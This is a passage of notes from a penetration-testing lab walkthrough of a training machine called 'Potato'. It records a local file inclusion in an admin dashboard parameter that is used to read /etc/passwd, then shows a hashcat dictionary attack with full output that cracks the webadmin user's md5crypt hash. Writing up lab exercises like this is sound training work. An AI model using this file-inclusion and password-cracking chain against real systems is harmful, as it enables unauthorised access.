LFI
LFI has been identified in the file parameter of the /admin/dashboard.php?page=log endpoint
/Play/Potato/3-Exploitation/attachments/{F0A8082D-5161-4388-B704-52EFDC8CAE79}.png)
Interestingly, there is a system user, webadmin, and users credential hash is hard-coded on the the /etc/passwd file; $1$webadmin$3sXBxGUtDGIFAcnNTNhi6/
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/potato]
└─$ hashcat -a 0 -m 500 webadmin.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Host memory required for this attack: 3 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:dragon
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$webadmin$3sXBxGUtDGIFAcnNTNhi6/
Time.Started.....: Sun Apr 27 18:33:23 2025 (0 secs)
Time.Estimated...: Sun Apr 27 18:33:23 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 47101 H/s (5.31ms) @ Accel:64 Loops:500 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 768/14344385 (0.01%)
Rejected.........: 0/768 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> james1
Hardware.Mon.#1..: Util: 9%
Started: Sun Apr 27 18:33:10 2025
Stopped: Sun Apr 27 18:33:25 2025Password hash cracked for the webadmin user; dragon
Validating the credential against the target SSH server.